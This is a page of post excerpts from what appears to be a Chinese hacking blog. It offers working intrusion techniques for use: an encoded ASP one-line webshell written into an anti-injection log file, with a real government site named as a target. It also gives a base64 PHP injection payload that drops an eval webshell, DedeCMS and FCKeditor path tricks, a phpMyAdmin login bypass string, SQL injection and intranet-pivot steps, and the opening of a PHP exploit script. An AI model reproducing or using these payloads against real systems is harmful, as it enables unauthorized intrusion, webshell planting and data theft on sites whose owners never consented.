天黑再动手

摘要： 今晚群里朋友叫看个站，有sql防注入，绕不过，但是有发现记录wrong的文件sqlin.asp既然做了记录，再查看了下它的记录文件于是想着构造个asp一句话写进去，前面几种没加密的都失败了，于是写了个加密的.┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾http://www.baidu.com/sqlin.asp 菜刀连接之，成功 阅读全文

摘要： 有时在通过注射得到织梦程序的管理密码时，却发现找不到后台地址。这个时候大家可以尝试下在地址后面加上：1、/include/dialog/select_media.php?f=form1.murl2、/include/dialog/select_soft.php3.使用mysql_error 信息去试试 /data/mysql_error_trace.inc但不一定通杀。。DedeCmsV5.1 FreeSP1访问http://baidu.com/include/dialog/select_soft.php?activepath=/include/FCKeditor可以跳转目录跳转到根目录的方法 阅读全文

摘要： 利用方法：1.注册任意账户2.登陆用户，发表blog日志（注意是日志）3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志，论坛根目录下生成demo.php，一句发密码C 阅读全文

摘要： 这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾可在http://pzzl.gov.cn/sqlin.asp写入一句话，密码a连接上去可以看到另外的几个政府网站 阅读全文

摘要： 当你碰到SA的注入点，可以执行命令，但是web与数据库分离，你都会怎么做呢，当数据库不服务器不能连接外网的时候，是不是只想着从web搞呢，这篇文章从t00ls转载过来，希望对大家sa权限的注入点数据库web分离提供一些渗透思路。SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)一、DB机有公网IP.1:执行命令把系统防火墙和ip策略停止,netstat-an找到3389端口尝试连接.2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这样的机器.)如 阅读全文

摘要： 首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了.但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题.在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,毕竟没有经过尝试,我们也不知道里... 阅读全文

摘要： 进入phpmyadmin 登录口填'localhost'@'@'' 阅读全文

摘要： 现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷！ 正是因为注入攻击的流行，使的市面上的注入工具层出不穷！比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等！这大大方便的小菜们掌握注入 漏洞！可是，工具是死的，注入的手法却是活的，能否根据实际情况灵活地构造SQL注入语句，得到自己想要的信息，是[被屏蔽的不受欢迎关键词]高shou 与小菜的根本区别！只用工具，而不去管它的原理，是不可能得到提高的，当然，在遇到一些特殊情况的时候，那些只会用工具的小菜们也只能放弃了！所以学会手 工注入自己构造SQL注入语 阅读全文

摘要： <?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80);while (!$sock){print "\n[-] No response from {$host}:80 Trying a 阅读全文

摘要： 好久没有脚本入侵了,今天因为参加了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,进行了一次安检,结果是没有成功,因为iis的文件解析漏洞补上了,不过学到了一些Fckeditor在没有上传页面的情况下的入侵方式。首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/filemanager/browser/d. 阅读全文